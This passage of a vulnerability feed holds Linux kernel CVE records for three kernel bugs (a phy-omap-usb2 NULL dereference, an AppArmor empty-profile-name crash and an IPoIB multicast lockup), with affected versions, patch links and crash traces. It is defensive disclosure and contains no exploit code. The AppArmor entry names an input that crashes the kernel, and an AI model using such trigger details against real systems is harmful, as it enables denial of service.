"lessThan": "be3b82e4871ba00e9b5d0ede92d396d579d7b3b3",
"status": "affected",
"version": "657b306a7bdfca4ae1514b533a0e7c3c6d26dbc6",
"versionType": "git"
},
{
"lessThan": "8cc889b9dea0579726be9520fcc766077890b462",
"status": "affected",
"version": "657b306a7bdfca4ae1514b533a0e7c3c6d26dbc6",
"versionType": "git"
},
{
"lessThan": "0430bfcd46657d9116a26cd377f112cbc40826a4",
"status": "affected",
"version": "657b306a7bdfca4ae1514b533a0e7c3c6d26dbc6",
"versionType": "git"
},
{
"lessThan": "14ef61594a5a286ae0d493b8acbf9eac46fd04c4",
"status": "affected",
"version": "657b306a7bdfca4ae1514b533a0e7c3c6d26dbc6",
"versionType": "git"
},
{
"lessThan": "396e17af6761b3cc9e6e4ca94b4de7f642bfece1",
"status": "affected",
"version": "657b306a7bdfca4ae1514b533a0e7c3c6d26dbc6",
"versionType": "git"
},
{
"lessThan": "7104ba0f1958adb250319e68a15eff89ec4fd36d",
"status": "affected",
"version": "657b306a7bdfca4ae1514b533a0e7c3c6d26dbc6",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/phy/ti/phy-omap-usb2.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.7"
},
{
"lessThan": "3.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.78",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.17",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.78",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.17",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.5",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nphy: ti: phy-omap-usb2: Fix NULL pointer dereference for SRP\n\nIf the external phy working together with phy-omap-usb2 does not implement\nsend_srp(), we may still attempt to call it. This can happen on an idle\nEthernet gadget triggering a wakeup for example:\n\nconfigfs-gadget.g1 gadget.0: ECM Suspend\nconfigfs-gadget.g1 gadget.0: Port suspended. Triggering wakeup\n...\nUnable to handle kernel NULL pointer dereference at virtual address\n00000000 when execute\n...\nPC is at 0x0\nLR is at musb_gadget_wakeup+0x1d4/0x254 [musb_hdrc]\n...\nmusb_gadget_wakeup [musb_hdrc] from usb_gadget_wakeup+0x1c/0x3c [udc_core]\nusb_gadget_wakeup [udc_core] from eth_start_xmit+0x3b0/0x3d4 [u_ether]\neth_start_xmit [u_ether] from dev_hard_start_xmit+0x94/0x24c\ndev_hard_start_xmit from sch_direct_xmit+0x104/0x2e4\nsch_direct_xmit from __dev_queue_xmit+0x334/0xd88\n__dev_queue_xmit from arp_solicit+0xf0/0x268\narp_solicit from neigh_probe+0x54/0x7c\nneigh_probe from __neigh_event_send+0x22c/0x47c\n__neigh_event_send from neigh_resolve_output+0x14c/0x1c0\nneigh_resolve_output from ip_finish_output2+0x1c8/0x628\nip_finish_output2 from ip_send_skb+0x40/0xd8\nip_send_skb from udp_send_skb+0x124/0x340\nudp_send_skb from udp_sendmsg+0x780/0x984\nudp_sendmsg from __sys_sendto+0xd8/0x158\n__sys_sendto from ret_fast_syscall+0x0/0x58\n\nLet\u0027s fix the issue by checking for send_srp() and set_vbus() before\ncalling them. For USB peripheral only cases these both could be NULL."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:51:58.052Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/486218c11e8d1c8f515a3bdd70d62203609d4b6b"
},
{
"url": "https://git.kernel.org/stable/c/8398d8d735ee93a04fb9e9f490e8cacd737e3bf5"
},
{
"url": "https://git.kernel.org/stable/c/be3b82e4871ba00e9b5d0ede92d396d579d7b3b3"
},
{
"url": "https://git.kernel.org/stable/c/8cc889b9dea0579726be9520fcc766077890b462"
},
{
"url": "https://git.kernel.org/stable/c/0430bfcd46657d9116a26cd377f112cbc40826a4"
},
{
"url": "https://git.kernel.org/stable/c/14ef61594a5a286ae0d493b8acbf9eac46fd04c4"
},
{
"url": "https://git.kernel.org/stable/c/396e17af6761b3cc9e6e4ca94b4de7f642bfece1"
},
{
"url": "https://git.kernel.org/stable/c/7104ba0f1958adb250319e68a15eff89ec4fd36d"
}
],
"title": "phy: ti: phy-omap-usb2: Fix NULL pointer dereference for SRP",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26600",
"datePublished": "2024-02-24T14:56:55.674Z",
"dateReserved": "2024-02-19T14:20:24.128Z",
"dateUpdated": "2025-05-04T08:51:58.052Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52443 (GCVE-0-2023-52443)
Vulnerability from cvelistv5
Published
2024-02-22 16:13
Modified
2025-05-04 07:36
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
apparmor: avoid crash when parsed profile name is empty
When processing a packed profile in unpack_profile() described like
"profile :ns::samba-dcerpcd /usr/lib*/samba/{,samba/}samba-dcerpcd {...}"
a string ":samba-dcerpcd" is unpacked as a fully-qualified name and then
passed to aa_splitn_fqname().
aa_splitn_fqname() treats ":samba-dcerpcd" as only containing a namespace.
Thus it returns NULL for tmpname, meanwhile tmpns is non-NULL. Later
aa_alloc_profile() crashes as the new profile name is NULL now.
general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] PREEMPT SMP KASAN NOPTI
KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]
CPU: 6 PID: 1657 Comm: apparmor_parser Not tainted 6.7.0-rc2-dirty #16
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-3-gd478f380-rebuilt.opensuse.org 04/01/2014
RIP: 0010:strlen+0x1e/0xa0
Call Trace:
<TASK>
? strlen+0x1e/0xa0
aa_policy_init+0x1bb/0x230
aa_alloc_profile+0xb1/0x480
unpack_profile+0x3bc/0x4960
aa_unpack+0x309/0x15e0
aa_replace_profiles+0x213/0x33c0
policy_update+0x261/0x370
profile_replace+0x20e/0x2a0
vfs_write+0x2af/0xe00
ksys_write+0x126/0x250
do_syscall_64+0x46/0xf0
entry_SYSCALL_64_after_hwframe+0x6e/0x76
</TASK>
---[ end trace 0000000000000000 ]---
RIP: 0010:strlen+0x1e/0xa0
It seems such behaviour of aa_splitn_fqname() is expected and checked in
other places where it is called (e.g. aa_remove_profiles). Well, there
is an explicit comment "a ns name without a following profile is allowed"
inside.
AFAICS, nothing can prevent unpacked "name" to be in form like
":samba-dcerpcd" - it is passed from userspace.
Deny the whole profile set replacement in such case and inform user with
EPROTO and an explaining message.
Found by Linux Verification Center (linuxtesting.org).
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 04dc715e24d0820bf8740e1a1135ed61fe162bc8 Version: 04dc715e24d0820bf8740e1a1135ed61fe162bc8 Version: 04dc715e24d0820bf8740e1a1135ed61fe162bc8 Version: 04dc715e24d0820bf8740e1a1135ed61fe162bc8 Version: 04dc715e24d0820bf8740e1a1135ed61fe162bc8 Version: 04dc715e24d0820bf8740e1a1135ed61fe162bc8 Version: 04dc715e24d0820bf8740e1a1135ed61fe162bc8 Version: 04dc715e24d0820bf8740e1a1135ed61fe162bc8 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52443",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-22T18:29:41.510350Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:01.497Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T22:55:41.517Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9286ee97aa4803d99185768735011d0d65827c9e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1d8e62b5569cc1466ceb8a7e4872cf10160a9dcf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5ff00408e5029d3550ee77f62dc15f1e15c47f87"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0a12db736edbb4933e4274932aeea594b5876fa4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9d4fa5fe2b1d56662afd14915a73b4d0783ffa45"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5c0392fdafb0a2321311900be83ffa572bef8203"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/77ab09b92f16c8439a948d1af489196953dc4a0e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/55a8210c9e7d21ff2644809699765796d4bfb200"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"security/apparmor/policy_unpack.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9286ee97aa4803d99185768735011d0d65827c9e",
"status": "affected",
"version": "04dc715e24d0820bf8740e1a1135ed61fe162bc8",
"versionType": "git"
},
{
"lessThan": "1d8e62b5569cc1466ceb8a7e4872cf10160a9dcf",
"status": "affected",
"version": "04dc715e24d0820bf8740e1a1135ed61fe162bc8",
"versionType": "git"
},
{
"lessThan": "5ff00408e5029d3550ee77f62dc15f1e15c47f87",
"status": "affected",
"version": "04dc715e24d0820bf8740e1a1135ed61fe162bc8",
"versionType": "git"
},
{
"lessThan": "0a12db736edbb4933e4274932aeea594b5876fa4",
"status": "affected",
"version": "04dc715e24d0820bf8740e1a1135ed61fe162bc8",
"versionType": "git"
},
{
"lessThan": "9d4fa5fe2b1d56662afd14915a73b4d0783ffa45",
"status": "affected",
"version": "04dc715e24d0820bf8740e1a1135ed61fe162bc8",
"versionType": "git"
},
{
"lessThan": "5c0392fdafb0a2321311900be83ffa572bef8203",
"status": "affected",
"version": "04dc715e24d0820bf8740e1a1135ed61fe162bc8",
"versionType": "git"
},
{
"lessThan": "77ab09b92f16c8439a948d1af489196953dc4a0e",
"status": "affected",
"version": "04dc715e24d0820bf8740e1a1135ed61fe162bc8",
"versionType": "git"
},
{
"lessThan": "55a8210c9e7d21ff2644809699765796d4bfb200",
"status": "affected",
"version": "04dc715e24d0820bf8740e1a1135ed61fe162bc8",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"security/apparmor/policy_unpack.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.11"
},
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\napparmor: avoid crash when parsed profile name is empty\n\nWhen processing a packed profile in unpack_profile() described like\n\n \"profile :ns::samba-dcerpcd /usr/lib*/samba/{,samba/}samba-dcerpcd {...}\"\n\na string \":samba-dcerpcd\" is unpacked as a fully-qualified name and then\npassed to aa_splitn_fqname().\n\naa_splitn_fqname() treats \":samba-dcerpcd\" as only containing a namespace.\nThus it returns NULL for tmpname, meanwhile tmpns is non-NULL. Later\naa_alloc_profile() crashes as the new profile name is NULL now.\n\ngeneral protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] PREEMPT SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]\nCPU: 6 PID: 1657 Comm: apparmor_parser Not tainted 6.7.0-rc2-dirty #16\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-3-gd478f380-rebuilt.opensuse.org 04/01/2014\nRIP: 0010:strlen+0x1e/0xa0\nCall Trace:\n \u003cTASK\u003e\n ? strlen+0x1e/0xa0\n aa_policy_init+0x1bb/0x230\n aa_alloc_profile+0xb1/0x480\n unpack_profile+0x3bc/0x4960\n aa_unpack+0x309/0x15e0\n aa_replace_profiles+0x213/0x33c0\n policy_update+0x261/0x370\n profile_replace+0x20e/0x2a0\n vfs_write+0x2af/0xe00\n ksys_write+0x126/0x250\n do_syscall_64+0x46/0xf0\n entry_SYSCALL_64_after_hwframe+0x6e/0x76\n \u003c/TASK\u003e\n---[ end trace 0000000000000000 ]---\nRIP: 0010:strlen+0x1e/0xa0\n\nIt seems such behaviour of aa_splitn_fqname() is expected and checked in\nother places where it is called (e.g. aa_remove_profiles). Well, there\nis an explicit comment \"a ns name without a following profile is allowed\"\ninside.\n\nAFAICS, nothing can prevent unpacked \"name\" to be in form like\n\":samba-dcerpcd\" - it is passed from userspace.\n\nDeny the whole profile set replacement in such case and inform user with\nEPROTO and an explaining message.\n\nFound by Linux Verification Center (linuxtesting.org)."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:36:39.239Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9286ee97aa4803d99185768735011d0d65827c9e"
},
{
"url": "https://git.kernel.org/stable/c/1d8e62b5569cc1466ceb8a7e4872cf10160a9dcf"
},
{
"url": "https://git.kernel.org/stable/c/5ff00408e5029d3550ee77f62dc15f1e15c47f87"
},
{
"url": "https://git.kernel.org/stable/c/0a12db736edbb4933e4274932aeea594b5876fa4"
},
{
"url": "https://git.kernel.org/stable/c/9d4fa5fe2b1d56662afd14915a73b4d0783ffa45"
},
{
"url": "https://git.kernel.org/stable/c/5c0392fdafb0a2321311900be83ffa572bef8203"
},
{
"url": "https://git.kernel.org/stable/c/77ab09b92f16c8439a948d1af489196953dc4a0e"
},
{
"url": "https://git.kernel.org/stable/c/55a8210c9e7d21ff2644809699765796d4bfb200"
}
],
"title": "apparmor: avoid crash when parsed profile name is empty",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52443",
"datePublished": "2024-02-22T16:13:31.154Z",
"dateReserved": "2024-02-20T12:30:33.291Z",
"dateUpdated": "2025-05-04T07:36:39.239Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52587 (GCVE-0-2023-52587)
Vulnerability from cvelistv5
Published
2024-03-06 06:45
Modified
2025-05-04 07:39
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
IB/ipoib: Fix mcast list locking
Releasing the `priv->lock` while iterating the `priv->multicast_list` in
`ipoib_mcast_join_task()` opens a window for `ipoib_mcast_dev_flush()` to
remove the items while in the middle of iteration. If the mcast is removed
while the lock was dropped, the for loop spins forever resulting in a hard
lockup (as was reported on RHEL 4.18.0-372.75.1.el8_6 kernel):
Task A (kworker/u72:2 below) | Task B (kworker/u72:0 below)
-----------------------------------+-----------------------------------
ipoib_mcast_join_task(work) | ipoib_ib_dev_flush_light(work)
spin_lock_irq(&priv->lock) | __ipoib_ib_dev_flush(priv, ...)
list_for_each_entry(mcast, | ipoib_mcast_dev_flush(dev = priv->dev)
&priv->multicast_list, list) |
ipoib_mcast_join(dev, mcast) |
spin_unlock_irq(&priv->lock) |
| spin_lock_irqsave(&priv->lock, flags)
| list_for_each_entry_safe(mcast, tmcast,
| &priv->multicast_list, list)
| list_del(&mcast->list);
| list_add_tail(&mcast->list, &remove_list)
| spin_unlock_irqrestore(&priv->lock, flags)
spin_lock_irq(&priv->lock) |
| ipoib_mcast_remove_list(&remove_list)
(Here, `mcast` is no longer on the | list_for_each_entry_safe(mcast, tmcast,
`priv->multicast_list` and we keep | remove_list, list)
spinning on the `remove_list` of | >>> wait_for_completion(&mcast->done)
the other thread which is blocked |
and the list is still valid on |
it's stack.)
Fix this by keeping the lock held and changing to GFP_ATOMIC to prevent
eventual sleeps.
Unfortunately we could not reproduce the lockup and confirm this fix but
based on the code review I think this fix should address such lockups.
crash> bc 31
PID: 747 TASK: ff1c6a1a007e8000 CPU: 31 COMMAND: "kworker/u72:2"
--
[exception RIP: ipoib_mcast_join_task+0x1b1]
RIP: ffffffffc0944ac1 RSP: ff646f199a8c7e00 RFLAGS: 00000002
RAX: 0000000000000000 RBX: ff1c6a1a04dc82f8 RCX: 0000000000000000
work (&priv->mcast_task{,.work})
RDX: ff1c6a192d60ac68 RSI: 0000000000000286 RDI: ff1c6a1a04dc8000
&mcast->list
RBP: ff646f199a8c7e90 R8: ff1c699980019420 R9: ff1c6a1920c9a000
R10: ff646f199a8c7e00 R11: ff1c6a191a7d9800 R12: ff1c6a192d60ac00
mcast
R13: ff1c6a1d82200000 R14: ff1c6a1a04dc8000 R15: ff1c6a1a04dc82d8
dev priv (&priv->lock) &priv->multicast_list (aka head)
ORIG_RAX: ffffffffffffffff CS: 0010 SS: 0018
--- <NMI exception stack> ---
#5 [ff646f199a8c7e00] ipoib_mcast_join_task+0x1b1 at ffffffffc0944ac1 [ib_ipoib]
#6 [ff646f199a8c7e98] process_one_work+0x1a7 at ffffffff9bf10967
crash> rx ff646f199a8c7e68
ff646f199a8c7e68: ff1c6a1a04dc82f8 <<< work = &priv->mcast_task.work
crash> list -hO ipoib_dev_priv.multicast_list ff1c6a1a04dc8000
(empty)
crash> ipoib_dev_priv.mcast_task.work.func,mcast_mutex.owner.counter ff1c6a1a04dc8000
mcast_task.work.func = 0xffffffffc0944910 <ipoib_mcast_join_task>,
mcast_mutex.owner.counter = 0xff1c69998efec000
crash> b 8
PID: 8 TASK: ff1c69998efec000 CPU: 33 COMMAND: "kworker/u72:0"
--
#3 [ff646f1980153d50] wait_for_completion+0x96 at ffffffff9c7d7646
#4 [ff646f1980153d90] ipoib_mcast_remove_list+0x56 at ffffffffc0944dc6 [ib_ipoib]
#5 [ff646f1980153de8] ipoib_mcast_dev_flush+0x1a7 at ffffffffc09455a7 [ib_ipoib]
#6 [ff646f1980153e58] __ipoib_ib_dev_flush+0x1a4 at ffffffffc09431a4 [ib_ipoib]
#7 [ff
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52587",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-08T18:50:41.278526Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:23:13.749Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.201Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4c8922ae8eb8dcc1e4b7d1059d97a8334288d825"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/615e3adc2042b7be4ad122a043fc9135e6342c90"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ac2630fd3c90ffec34a0bfc4d413668538b0e8f2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ed790bd0903ed3352ebf7f650d910f49b7319b34"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5108a2dc2db5630fb6cd58b8be80a0c134bc310a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/342258fb46d66c1b4c7e2c3717ac01e10c03cf18"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7c7bd4d561e9dc6f5b7df9e184974915f6701a89"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4f973e211b3b1c6d36f7c6a19239d258856749f9"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/ulp/ipoib/ipoib_multicast.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4c8922ae8eb8dcc1e4b7d1059d97a8334288d825",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "615e3adc2042b7be4ad122a043fc9135e6342c90",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ac2630fd3c90ffec34a0bfc4d413668538b0e8f2",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ed790bd0903ed3352ebf7f650d910f49b7319b34",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5108a2dc2db5630fb6cd58b8be80a0c134bc310a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "342258fb46d66c1b4c7e2c3717ac01e10c03cf18",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7c7bd4d561e9dc6f5b7df9e184974915f6701a89",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4f973e211b3b1c6d36f7c6a19239d258856749f9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/ulp/ipoib/ipoib_multicast.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"vulnerable": true
},
{
